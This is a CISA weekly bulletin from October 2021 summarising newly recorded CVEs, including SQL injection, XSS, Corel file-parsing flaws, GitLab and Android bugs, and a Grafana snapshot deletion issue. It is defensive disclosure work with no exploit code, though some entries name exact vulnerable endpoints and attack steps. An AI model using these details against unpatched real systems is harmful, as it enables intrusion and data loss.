Vulnerability Summary for the Week of October 4, 2021

Released: Oct 11, 2021
Document ID: SB21-284

The CISA Vulnerability Bulletin provides a summary of new vulnerabilities that have been recorded in the past week. In some cases, the vulnerabilities in the bulletin may not yet have assigned CVSS scores.

Vulnerabilities are based on the Common Vulnerabilities and Exposures (CVE) vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division into high, medium, and low severities corresponds to the following scores:

  • High: vulnerabilities with a CVSS base score of 7.0–10.0
  • Medium: vulnerabilities with a CVSS base score of 4.0–6.9
  • Low: vulnerabilities with a CVSS base score of 0.0–3.9

Entries may include additional information provided by organizations and efforts sponsored by CISA. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletin is compiled from external, open-source reports and is not a direct result of CISA analysis. 


High Vulnerabilities

Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info

archibus -- web_central | ** UNSUPPORTED WHEN ASSIGNED ** In ARCHIBUS Web Central 21.3.3.815 (a version from 2014), the Web Application in /archibus/login.axvw assigns a session token that could be already in use by another user. It was therefore possible to access the application through a user whose credentials were not known, without any attempt by the testers to modify the application logic. It is also possible to set the value of the session token, client-side, simply by making an unauthenticated GET Request to the Home Page and adding an arbitrary value to the JSESSIONID field. The application, following the login, does not assign a new token, continuing to keep the inserted one as the identifier of the entire session. This is fixed in all recent versions, such as version 26. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. Version 21.3 was officially de-supported by the end of 2020. | 2021-10-05 | 7.5 | CVE-2021-41553 (MISC)

aviatorscript_project -- aviatorscript | AviatorScript through 5.2.7 allows code execution via an expression that is encoded with Byte Code Engineering Library (BCEL). | 2021-10-02 | 7.5 | CVE-2021-41862 (MISC)

commonwl -- cwlviewer | cwlviewer is a web application to view and share Common Workflow Language workflows. Versions prior to 1.3.1 contain a Deserialization of Untrusted Data vulnerability. Commit number f6066f09edb70033a2ce80200e9fa9e70a5c29de (dated 2021-09-30) contains a patch. There are no available workarounds aside from installing the patch. The SnakeYaml constructor, by default, allows any data to be parsed. To fix the issue the object needs to be created with a `SafeConstructor` object, as seen in the patch. | 2021-10-01 | 7.5 | CVE-2021-41110 (MISC, MISC, CONFIRM)

corel -- pdf_fusion | Coreip.dll in Corel PDF Fusion 2.6.2.0 is affected by an Out-of-bounds Write vulnerability when parsing a crafted file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious PDF file. | 2021-10-01 | 9.3 | CVE-2021-38096 (MISC, MISC)

corel -- pdf_fusion | Corel PDF Fusion 2.6.2.0 is affected by an Out-of-bounds Write vulnerability when parsing a crafted file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious PDF file. | 2021-10-01 | 9.3 | CVE-2021-38097 (MISC, MISC)

corel -- photopaint_2020 | CDRRip.dll in Corel PhotoPaint Standard 2020 22.0.0.474 is affected by an Out-of-bounds Write vulnerability when parsing a crafted file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious CPT file. This is different from CVE-2021-38101. | 2021-10-01 | 9.3 | CVE-2021-38099 (MISC, MISC)

corel -- presentations_2020 | IBJPG2.FLT in Corel Presentations 2020 20.0.0.200 is affected by an Out-of-bounds Write vulnerability when parsing a crafted file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious PPT file. | 2021-10-01 | 9.3 | CVE-2021-38103 (MISC, MISC)

dell -- isilon_insightiq_firmware | Dell EMC InsightIQ, versions prior to 4.1.4, contain risky cryptographic algorithms in the SSH component. A remote unauthenticated attacker could potentially exploit this vulnerability, leading to authentication bypass and remote takeover of the InsightIQ. This allows an attacker to take complete control of InsightIQ to affect services provided by SSH, so Dell recommends that customers upgrade at the earliest opportunity. | 2021-10-01 | 7.5 | CVE-2021-36298 (MISC)

galera -- galera_webtemplate | Galera WebTemplate 1.0 is affected by a directory traversal vulnerability that could reveal information from /etc/passwd and /etc/shadow. | 2021-10-01 | 7.5 | CVE-2021-40960 (MISC, MISC)

getcomposer -- composer | Composer is an open source dependency manager for the PHP language. In affected versions, Windows users running Composer to install untrusted dependencies are subject to command injection and should upgrade their Composer version. Other OSs and WSL are not affected. The issue has been resolved in Composer versions 1.10.23 and 2.1.9. There are no workarounds for this issue. | 2021-10-05 | 7.5 | CVE-2021-41116 (MISC, CONFIRM)

hotel_and_lodge_booking_management_system_project -- hotel_and_lodge_booking_management_system | Sourcecodester Hotel and Lodge Management System 2.0 is vulnerable to unauthenticated SQL injection and can allow remote attackers to execute arbitrary SQL commands via the email parameter to the edit page for Customer, Room, Currency, Room Booking Details, or Tax Details. | 2021-10-01 | 7.5 | CVE-2020-21012 (MISC)

lodging_reservation_management_system_project -- lodging_reservation_management_system | The username and password fields of the login in Lodging Reservation Management System V1 can give access to any user by using SQL injection to bypass authentication. | 2021-10-04 | 7.5 | CVE-2021-41511 (MISC, MISC, MISC)

online-shopping-system-advanced_project -- online-shopping-system-advanced | An unauthenticated SQL Injection exists in PuneethReddyHC online-shopping-system-advanced through the /homeaction.php cat_id parameter. Using a POST request does not sanitize the user input. | 2021-10-01 | 7.5 | CVE-2021-41649 (MISC)

ptcl -- hg150-ub_firmware | An issue in the administrator authentication panel of PTCL HG150-Ub v3.0 allows attackers to bypass authentication via modification of the cookie value and Response Path. | 2021-10-04 | 7.5 | CVE-2021-35296 (MISC)

qnap -- qvr | A command injection vulnerability has been reported to affect QNAP devices running QVR. If exploited, this vulnerability could allow remote attackers to run arbitrary commands. We have already fixed this vulnerability in the following versions of QVR: QVR 5.1.5 build 20210902 and later. | 2021-10-01 | 7.5 | CVE-2021-34352 (MISC)


Medium Vulnerabilities

Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info

3xlogic -- infinias_access_control | An issue was discovered in 3xLogic Infinias Access Control through 6.7.10708.0, affecting physical security. Users with login credentials assigned to a specific zone can send modified HTTP GET and POST requests, allowing them to view user data such as personal information and Prox card credentials. Also, an authorized user of one zone can send API requests to unlock electronic locks associated with zones they are unauthorized to have access to. They can also create new user logins for zones they were not authorized to access, including the root zone of the software. | 2021-10-01 | 6.5 | CVE-2021-41847 (MISC, MISC, MISC)

53kf -- 53kf | Cross-site scripting vulnerability in 53KF < 2.0.0.2 that allows arbitrary code to be executed via a crafted HTML statement inserted into the chat window. | 2021-10-04 | 4.3 | CVE-2020-28119 (MISC)

afian -- filerun | Afian FileRun 2021.03.26 allows stored XSS via an HTTP X-Forwarded-For header that is mishandled when rendering Activity Logs. | 2021-10-05 | 4.3 | CVE-2021-35503 (MISC, MISC)

afian -- filerun | Afian FileRun 2021.03.26 allows XSS when an administrator encounters a crafted document during use of the HTML Editor for a preview or edit action. | 2021-10-05 | 4.3 | CVE-2021-35506 (MISC, MISC)

alfred-spotify-mini-player -- alfred_spotify_mini_player | Cross-site scripting (XSS) vulnerability in callback.php in Spotify-for-Alfred 0.13.9 and below allows remote attackers to inject arbitrary web script or HTML via the error parameter. | 2021-10-01 | 4.3 | CVE-2021-40927 (MISC, MISC)

archibus -- web_central | ** UNSUPPORTED WHEN ASSIGNED ** In ARCHIBUS Web Central 21.3.3.815 (a version from 2014), XSS occurs in /archibus/dwr/call/plaincall/workflow.runWorkflowRule.dwr because the data received as input from clients is re-included within the HTTP response returned by the application without adequate validation. In this way, if HTML code or client-side executable code (e.g., Javascript) is entered as input, the expected execution flow could be altered. This is fixed in all recent versions, such as version 26. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. Version 21.3 was officially de-supported by the end of 2020. | 2021-10-05 | 4.3 | CVE-2021-41555 (MISC)

archibus -- web_central | ** UNSUPPORTED WHEN ASSIGNED ** ARCHIBUS Web Central 21.3.3.815 (a version from 2014) does not properly validate requests for access to data and functionality in these affected endpoints: /archibus/schema/ab-edit-users.axvw, /archibus/schema/ab-data-dictionary-table.axvw, /archibus/schema/ab-schema-add-field.axvw, /archibus/schema/ab-core/views/process-navigator/ab-my-user-profile.axvw. By not verifying the permissions for access to resources, it allows a potential attacker to view pages that are not allowed. Specifically, it was found that any authenticated user can reach the administrative console for user management by directly requesting access to the page via URL. This allows a malicious user to modify all users' profiles, to elevate any privileges to administrative ones, or to create or delete any type of user. It is also possible to modify the emails of other users, through a misconfiguration of the username parameter, on the user profile page. This is fixed in all recent versions, such as version 26. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. Version 21.3 was officially de-supported by the end of 2020. | 2021-10-05 | 6.5 | CVE-2021-41554 (MISC)

bosch -- rexroth_indramotion_mlc_l20_firmware | The web server is vulnerable to reflected XSS and therefore an attacker might be able to execute scripts on a client’s computer by sending the client a manipulated URL. | 2021-10-04 | 4.3 | CVE-2021-23856 (CONFIRM)

canonical -- apport | An information disclosure via path traversal was discovered in apport/hookutils.py function read_file(). This issue affects: apport 2.14.1 versions prior to 2.14.1-0ubuntu3.29+esm8; 2.20.1 versions prior to 2.20.1-0ubuntu2.30+esm2; 2.20.9 versions prior to 2.20.9-0ubuntu7.26; 2.20.11 versions prior to 2.20.11-0ubuntu27.20; 2.20.11 versions prior to 2.20.11-0ubuntu65.3. | 2021-10-01 | 4.7 | CVE-2021-3710 (MISC, MISC, MISC, MISC)

canonical -- multipass | The Windows version of Multipass before 1.7.0 allowed any local process to connect to the localhost TCP control socket to perform mounts from the operating system to a guest, allowing for privilege escalation. | 2021-10-01 | 4.6 | CVE-2021-3626 (MISC)

canonical -- multipass | The MacOS version of Multipass, version 1.7.0, fixed in 1.7.2, accidentally installed the application directory with an incorrect owner. | 2021-10-01 | 4.6 | CVE-2021-3747 (MISC)

codesolz -- better_find_and_replace | The Better Find and Replace WordPress plugin before 1.2.9 does not escape the 's' GET parameter before outputting it back in the All Masking Rules page, leading to a Reflected Cross-Site Scripting issue. | 2021-10-04 | 4.3 | CVE-2021-24676 (MISC)

coinmarketstats -- woo-altcoin-payment-gateway | The Bitcoin / AltCoin Payment Gateway for WooCommerce WordPress plugin before 1.6.1 does not escape the 's' GET parameter before outputting it back in the All Masking Rules page, leading to a Reflected Cross-Site Scripting issue. | 2021-10-04 | 4.3 | CVE-2021-24679 (MISC)

concrete5-legacy_project -- concrete5-legacy | Cross-site scripting (XSS) vulnerability in toos/permissions/dialogs/access/entity/types/group_combination.php in concrete5-legacy 5.6.4.0 and below allows remote attackers to inject arbitrary web script or HTML via the cID parameter. | 2021-10-01 | 4.3 | CVE-2021-41463 (MISC, MISC)

concrete5-legacy_project -- concrete5-legacy | Cross-site scripting (XSS) vulnerability in concrete/elements/collection_theme.php in concrete5-legacy 5.6.4.0 and below allows remote attackers to inject arbitrary web script or HTML via the rel parameter. | 2021-10-01 | 4.3 | CVE-2021-41465 (MISC, MISC)

concrete5-legacy_project -- concrete5-legacy | Cross-site scripting (XSS) vulnerability in concrete/elements/collection_add.php in concrete5-legacy 5.6.4.0 and below allows remote attackers to inject arbitrary web script or HTML via the rel parameter. | 2021-10-01 | 4.3 | CVE-2021-41464 (MISC, MISC)

concrete5-legacy_project -- concrete5-legacy | Cross-site scripting (XSS) vulnerability in concrete/elements/collection_add.php in concrete5-legacy 5.6.4.0 and below allows remote attackers to inject arbitrary web script or HTML via the ctID parameter. | 2021-10-01 | 4.3 | CVE-2021-41462 (MISC, MISC)

concrete5-legacy_project -- concrete5-legacy | Cross-site scripting (XSS) vulnerability in concrete/elements/collection_add.php in concrete5-legacy 5.6.4.0 and below allows remote attackers to inject arbitrary web script or HTML via the mode parameter. | 2021-10-01 | 4.3 | CVE-2021-41461 (MISC, MISC)
corel -- coreldraw_2020 | CdrCore.dll in Corel DrawStandard 2020 22.0.0.474 is affected by an Out-of-bounds Read vulnerability when parsing a crafted file. An unauthenticated attacker could leverage this vulnerability to access unauthorized system memory in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious CDR file. | 2021-10-02 | 4.3 | CVE-2021-38107 (MISC, MISC)

corel -- coreldraw_2020 | Corel DrawStandard 2020 22.0.0.474 is affected by an Out-of-bounds Read vulnerability when parsing a crafted file. An unauthenticated attacker could leverage this vulnerability to access unauthorized system memory in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious CDR file. | 2021-10-02 | 4.3 | CVE-2021-38109 (MISC, MISC)

corel -- pdf_fusion | Corel PDF Fusion 2.6.2.0 is affected by a Heap Corruption vulnerability when parsing a crafted file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious PDF file. | 2021-10-01 | 6.8 | CVE-2021-38098 (MISC, MISC)

corel -- photopaint_2020 | Corel PhotoPaint Standard 2020 22.0.0.474 is affected by an Out-of-bounds Write vulnerability when parsing a crafted file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious CPT file. | 2021-10-01 | 6.8 | CVE-2021-38100 (MISC, MISC)

corel -- photopaint_2020 | CDRRip.dll in Corel PhotoPaint Standard 2020 22.0.0.474 is affected by an Out-of-bounds Write vulnerability when parsing a crafted file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious CPT file. This is different from CVE-2021-38099. | 2021-10-01 | 6.8 | CVE-2021-38101 (MISC, MISC)

corel -- presentations_2020 | IPPP82.FLT in Corel Presentations 2020 20.0.0.200 is affected by an Out-of-bounds Read vulnerability when parsing a crafted file. An unauthenticated attacker could leverage this vulnerability to access unauthorized system memory in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious PPT file. This is different from CVE-2021-38102. | 2021-10-01 | 4.3 | CVE-2021-38105 (MISC, MISC)

corel -- presentations_2020 | IPPP72.FLT in Corel Presentations 2020 20.0.0.200 is affected by an Out-of-bounds Read vulnerability when parsing a crafted file. An unauthenticated attacker could leverage this vulnerability to access unauthorized system memory in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious PPT file. | 2021-10-01 | 4.3 | CVE-2021-38104 (MISC, MISC)

corel -- presentations_2020 | UAX200.dll in Corel Presentations 2020 20.0.0.200 is affected by an Out-of-bounds Read vulnerability when parsing a crafted file. An unauthenticated attacker could leverage this vulnerability to access unauthorized system memory in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious PPT file. | 2021-10-01 | 4.3 | CVE-2021-38106 (MISC, MISC)

corel -- presentations_2020 | IPPP82.FLT in Corel Presentations 2020 20.0.0.200 is affected by an Out-of-bounds Read vulnerability when parsing a crafted file. An unauthenticated attacker could leverage this vulnerability to access unauthorized system memory in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious PPT file. This is different from CVE-2021-38105. | 2021-10-01 | 4.3 | CVE-2021-38102 (MISC, MISC)

corel -- wordperfect_2020 | Word97Import200.dll in Corel WordPerfect 2020 20.0.0.200 is affected by an Out-of-bounds Read vulnerability when parsing a crafted file. An unauthenticated attacker could leverage this vulnerability to access unauthorized system memory in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious DOC file. | 2021-10-02 | 4.3 | CVE-2021-38108 (MISC, MISC)

corel -- wordperfect_2020 | Word97Import200.dll in Corel WordPerfect 2020 20.0.0.200 is affected by an Out-of-bounds Write vulnerability when parsing a crafted file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious DOC file. | 2021-10-01 | 6.8 | CVE-2021-38110 (MISC, MISC)

dell -- enterprise_sonic_os | Dell Enterprise SONiC OS, versions 3.3.0 and earlier, contains a sensitive information disclosure vulnerability. An authenticated malicious user with access to the system may use the stored TACACS\Radius credentials to read sensitive information and use it in further attacks. | 2021-10-01 | 4 | CVE-2021-36309 (MISC)

detector_project -- detector | Cross-site scripting (XSS) vulnerability in _contactform.inc.php in Detector 0.8.5 and below allows remote attackers to inject arbitrary web script or HTML via the cid parameter. | 2021-10-01 | 4.3 | CVE-2021-40921 (MISC)

docker -- command_line_interface | Docker CLI is the command line interface for the docker container runtime. A bug was found in the Docker CLI where running `docker login my-private-registry.example.com` with a misconfigured configuration file (typically `~/.docker/config.json`) listing a `credsStore` or `credHelpers` that could not be executed would result in any provided credentials being sent to `registry-1.docker.io` rather than the intended private registry. This bug has been fixed in Docker CLI 20.10.9. Users should update to this version as soon as possible. For users unable to update, ensure that any configured credsStore or credHelpers entries in the configuration file reference an installed credential helper that is executable and on the PATH. | 2021-10-04 | 5 | CVE-2021-41092 (MISC, CONFIRM)

ecommerce-codeigniter-bootstrap_project -- ecommerce-codeigniter-bootstrap | Cross-site scripting (XSS) vulnerability in application/modules/admin/views/ecommerce/products.php in Ecommerce-CodeIgniter-Bootstrap (Codeigniter 3.1.11, Bootstrap 3.3.7) allows remote attackers to inject arbitrary web script or HTML via the search_title parameter. | 2021-10-01 | 4.3 | CVE-2021-40975 (MISC)

emlog -- emlog | emlog v6.0.0 contains a SQL injection via /admin/comment.php. | 2021-10-01 | 6.5 | CVE-2020-21013 (MISC)

emlog -- emlog | emlog v6.0.0 contains an arbitrary file deletion vulnerability in admin/plugin.php. | 2021-10-01 | 5.5 | CVE-2020-21014 (MISC)

esri -- portal_for_arcgis | There is a privilege escalation vulnerability in organization-specific logins in Esri Portal for ArcGIS versions 10.9 and below that may allow a remote, authenticated attacker to impersonate another account. | 2021-10-01 | 6.5 | CVE-2021-29108 (CONFIRM)

esri -- portal_for_arcgis | A reflected XSS vulnerability in Esri Portal for ArcGIS version 10.9 and below may allow a remote attacker able to convince a user to click on a crafted link to potentially execute arbitrary JavaScript code in the user’s browser. | 2021-10-01 | 4.3 | CVE-2021-29109 (CONFIRM)

faveohelpdesk -- faveo | Cross-site scripting (XSS) vulnerability in dompdf/dompdf/www/demo.php in faveo-helpdesk v1.11.0 and below allows remote attackers to inject arbitrary web script or HTML via the $_SERVER["PHP_SELF"] parameter. | 2021-10-01 | 4.3 | CVE-2021-40925 (MISC, MISC)

getid3 -- getid3 | Cross-site scripting (XSS) vulnerability in demos/demo.mysqli.php in getID3 1.X and v2.0.0-beta allows remote attackers to inject arbitrary web script or HTML via the showtagfiles parameter. | 2021-10-01 | 4.3 | CVE-2021-40926 (MISC, MISC)
gitlab -- gitlab | The project import/export feature in GitLab 8.9 and greater could be used to obtain otherwise private email addresses. | 2021-10-05 | 4 | CVE-2021-22258 (CONFIRM, MISC, MISC)

gitlab -- gitlab | A potential DoS vulnerability was discovered in GitLab EE starting with version 12.6 due to a lack of pagination in the dependencies API. | 2021-10-04 | 4 | CVE-2021-22259 (MISC, CONFIRM)

gitlab -- gitlab | In all versions of GitLab CE/EE since version 8.0, access tokens created as part of an admin's impersonation of a user are not cleared at the end of impersonation, which may lead to unnecessary sensitive info disclosure. | 2021-10-05 | 4 | CVE-2021-39891 (MISC, CONFIRM)

gitlab -- gitlab | In all versions of GitLab EE since version 14.1, due to an insecure direct object reference vulnerability, an endpoint may reveal the protected branch name to a malicious user who makes a crafted API call with the ID of the protected branch. | 2021-10-05 | 4 | CVE-2021-39889 (MISC, MISC, CONFIRM)

gitlab -- gitlab | Permissions rules were not applied while issues were moved between projects of the same group in GitLab versions starting with 10.6 and up to 14.1.7, allowing users to read confidential Epic references. | 2021-10-05 | 4 | CVE-2021-39886 (MISC, CONFIRM)

gitlab -- gitlab | A Denial of Service vulnerability in the apollo_upload_server Ruby gem in GitLab CE/EE version 11.11 and above allows an attacker to deny access to all users via specially crafted requests to the apollo_upload_server middleware. | 2021-10-05 | 4 | CVE-2021-39880 (CONFIRM, MISC, MISC)

gitlab -- gitlab | In all versions of GitLab CE/EE since version 11.11, an instance that has the setting to disable Repo by URL import enabled is bypassed by an attacker making a crafted API call. | 2021-10-05 | 4 | CVE-2021-39870 (MISC, MISC, CONFIRM)

gitlab -- gitlab | An issue has been discovered in GitLab affecting all versions starting from 14.0 before 14.0.9, all versions starting from 14.1 before 14.1.4, and all versions starting from 14.2 before 14.2.2. The route for /user.keys is not restricted on instances with public visibility disabled. This allows user enumeration on such instances. | 2021-10-05 | 5 | CVE-2021-22257 (MISC, CONFIRM)

gitlab -- gitlab | Missing access control in GitLab version 13.10 and above with Jira Cloud integration enabled allows Jira users without administrative privileges to add and remove Jira Connect Namespaces via the GitLab.com for Jira Cloud application configuration page. | 2021-10-05 | 5 | CVE-2021-22262 (CONFIRM, MISC, MISC)

gitlab -- gitlab | A potential DoS vulnerability was discovered in GitLab starting with version 9.1 that allowed parsing files without authorisation. | 2021-10-05 | 5 | CVE-2021-39893 (MISC, CONFIRM)

gitlab -- gitlab | An issue has been discovered in GitLab affecting all versions starting from 13.8 before 14.0.9, all versions starting from 14.1 before 14.1.4, and all versions starting from 14.2 before 14.2.2. Under specialized conditions, an invited group member may continue to have access to a project even after the invited group, which the member was part of, is deleted. | 2021-10-05 | 4.3 | CVE-2021-22264 (CONFIRM, MISC)

glimmrtv -- flextv | Cross-site scripting (XSS) vulnerability in index.php in FlexTV beta development version allows remote attackers to inject arbitrary web script or HTML via the PHP_SELF parameter. | 2021-10-01 | 4.3 | CVE-2021-40928 (MISC, MISC)

google -- android | In sendBroadcastToInstaller of FirstScreenBroadcast.java, there is a possible activity launch due to an unsafe PendingIntent. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11, Android-9, Android-10. Android ID: A-179289753. | 2021-10-06 | 4.6 | CVE-2021-0692 (MISC)

google -- android | In the SELinux policy configured in system_app.te, there is a possible way for system_app to gain code execution in other processes due to an overly-permissive SELinux policy. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-188554048. | 2021-10-06 | 4.6 | CVE-2021-0691 (MISC)

google -- android | When extracting an incorrectly formatted AVI file, the memory is damaged, the playback interface shows that the video cannot be played, and the log shows a crash. This problem may lead to malicious code attacks, resulting in the loss of user rights. Product: Android. Version: Android-10. Android ID: A-189392423. | 2021-10-06 | 6.8 | CVE-2021-0636 (MISC)

google -- android | In ParsedIntentInfo of ParsedIntentInfo.java, there is a possible parcel serialization/deserialization mismatch due to unsafe deserialization. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-191055353. | 2021-10-06 | 4.6 | CVE-2021-0685 (MISC)

google -- android | In TouchInputMapper::sync of TouchInputMapper.cpp, there is a possible out of bounds write due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10, Android-11, Android-8.1, Android-9. Android ID: A-179839665. | 2021-10-06 | 4.6 | CVE-2021-0684 (MISC)

google -- android | When extracting an incorrectly formatted FLV file, the memory is damaged, the playback interface shows that the video cannot be played, and the log shows a crash. This problem may lead to malicious code attacks, resulting in the loss of user rights. Product: Android. Version: Android-10. Android ID: A-189402477. | 2021-10-06 | 6.8 | CVE-2021-0635 (MISC)

google -- android | In runTraceIpcStop of ActivityManagerShellCommand.java, there is a possible deletion of system files due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11, Android-8.1, Android-9, Android-10. Android ID: A-185398942. | 2021-10-06 | 4.6 | CVE-2021-0683 (MISC)

google -- android | In ih264d_mark_err_slice_skip of ih264d_parse_pslice.c, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-9, Android-10, Android-11, Android-8.1. Android ID: A-182152757. | 2021-10-06 | 4.3 | CVE-2021-0690 (MISC)

google -- android | In lockAllProfileTasks of RootWindowContainer.java, there is a possible way to access the work profile without the profile PIN, after logging in. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-9, Android-10, Android-11, Android-8.1. Android ID: A-177457096. | 2021-10-06 | 4.6 | CVE-2021-0595 (MISC)

google -- android | In onCreate of ConfirmConnectActivity.java, there is a possible pairing of untrusted Bluetooth devices due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-11, Android-8.1, Android-9, Android-10. Android ID: A-180422108. | 2021-10-06 | 4.4 | CVE-2021-0598 (MISC)

google -- android | In lockNow of PhoneWindowManager.java, there is a possible lock screen bypass due to a race condition. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10, Android-11, Android-8.1, Android-9. Android ID: A-161149543. | 2021-10-06 | 4.4 | CVE-2021-0688 (MISC)
gpac -- mp4boxThere is a stack buffer overflow in MP4Box v1.0.1 at src/filters/dmx_nhml.c:1008 in the nhmldmx_send_sample() function szXmlFrom parameter which leads to a denial of service vulnerability.2021-10-015CVE-2021-41459
MISC
gpac -- mp4boxThere is a stack buffer overflow in MP4Box v1.0.1 at src/filters/dmx_nhml.c:1004 in the nhmldmx_send_sample() function szXmlTo parameter which leads to a denial of service vulnerability.2021-10-015CVE-2021-41456
MISC
gpac -- mp4boxThere is a stack buffer overflow in MP4Box 1.1.0 at src/filters/dmx_nhml.c in nhmldmx_init_parsing which leads to a denial of service vulnerability.2021-10-015CVE-2021-41457
MISC
grafana -- grafanaGrafana is an open source data visualization platform. In affected versions unauthenticated and authenticated users are able to view the snapshot with the lowest database key by accessing the literal paths: /dashboard/snapshot/:key, or /api/snapshots/:key. If the snapshot "public_mode" configuration setting is set to true (vs default of false), unauthenticated users are able to delete the snapshot with the lowest database key by accessing the literal path: /api/snapshots-delete/:deleteKey. Regardless of the snapshot "public_mode" setting, authenticated users are able to delete the snapshot with the lowest database key by accessing the literal paths: /api/snapshots/:key, or /api/snapshots-delete/:deleteKey. The combination of deletion and viewing enables a complete walk through all snapshot data while resulting in complete snapshot data loss. This issue has been resolved in versions 8.1.6 and 7.5.11. If for some reason you cannot upgrade you can use a reverse proxy or similar to block access to the literal paths: /api/snapshots/:key, /api/snapshots-delete/:deleteKey, /dashboard/snapshot/:key, and /api/snapshots/:key. They have no normal function and can be disabled without side effects.2021-10-056.8CVE-2021-39226
MISC
MISC
CONFIRM
MISC
MLIST
hkurl -- i-panel_administration_systemA reflected cross-site scripting (XSS) vulnerability exists in the i-Panel Administration System Version 2.0 that enables a remote attacker to execute arbitrary JavaScript code in the browser-based web console and it is possible to insert a vulnerable malicious button.2021-10-044.3CVE-2021-41878
MISC
MISC
ibm -- sterling_b2b_integratorIBM Sterling B2B Integrator Standard Edition 5.2.0.0 through 6.1.1.0 could allow an authenticated user to perform actions that they should not be able to access due to improper access controls. IBM X-Force ID: 202169.2021-10-064CVE-2021-29758
CONFIRM
XF
ibm -- sterling_b2b_integrator | IBM Sterling B2B Integrator Standard Edition 5.2.0.0 through 6.1.1.0 could allow an authenticated user to download unauthorized files through the dashboard user interface. IBM X-Force ID: 202213. | 2021-10-06 | 4 | CVE-2021-29760
CONFIRM
XF
ibm -- sterling_b2b_integrator | IBM Sterling B2B Integrator Standard Edition 5.2.0.0 through 6.1.1.0 could allow an authenticated user to obtain sensitive information from the dashboard that they should not have access to. IBM X-Force ID: 202265. | 2021-10-06 | 4 | CVE-2021-29761
CONFIRM
XF
jizhicms -- jizhicms | JIZHICMS 1.5.1 contains a cross-site scripting (XSS) vulnerability in the component /user/release.html, which allows attackers to arbitrarily add an administrator cookie. | 2021-10-01 | 4.3 | CVE-2020-21228
MISC
MISC
MISC
justwriting_project -- justwriting | Cross-site scripting (XSS) vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allows remote attackers to inject arbitrary web script or HTML via the challenge parameter. | 2021-10-01 | 4.3 | CVE-2021-41467
MISC
MISC
linux -- linux_kernel | prealloc_elems_and_freelist in kernel/bpf/stackmap.c in the Linux kernel through 5.14.9 allows unprivileged users to trigger an eBPF multiplication integer overflow with a resultant out-of-bounds write. | 2021-10-02 | 4.6 | CVE-2021-41864
MISC
MISC
FEDORA
maccms -- maccms | A Cross-Site Request Forgery (CSRF) in the component admin.php/admin/type/info.html of Maccms 10 allows attackers to gain administrator privileges. | 2021-10-04 | 6.8 | CVE-2020-21386
MISC
maccms -- maccms | A cross-site scripting (XSS) vulnerability in the parameter type_en of Maccms 10 allows attackers to obtain the administrator cookie and escalate privileges via a crafted payload. | 2021-10-04 | 4.3 | CVE-2020-21387
MISC
mcafee -- drive_encryption | Privilege Escalation vulnerability in a Windows system driver of McAfee Drive Encryption (DE) prior to 7.3.0 could allow a local non-admin user to gain elevated system privileges via exploiting an unutilized memory buffer. | 2021-10-01 | 4.6 | CVE-2021-23893
CONFIRM
meowapps -- media_file_renamer_-_auto_&_manual_rename | Cross-Site Request Forgery (CSRF) vulnerability in WordPress Media File Renamer – Auto & Manual Rename plugin (versions <= 5.1.9). Affected parameters "post_title", "filename", "lock". This allows changing the uploaded media title, media file name, and media locking state. | 2021-10-04 | 4.3 | CVE-2021-36850
CONFIRM
MISC
meowapps -- meow_gallery | The Meow Gallery WordPress plugin before 4.1.9 does not sanitise, validate or escape the ids attribute of its gallery shortcode (available for users as low as Contributor) before using it in an SQL statement, leading to an authenticated SQL Injection issue. The injection also allows the returned values to be manipulated in a way that could lead to data disclosure and arbitrary objects to be deserialized. | 2021-10-04 | 5.5 | CVE-2021-24465
MISC
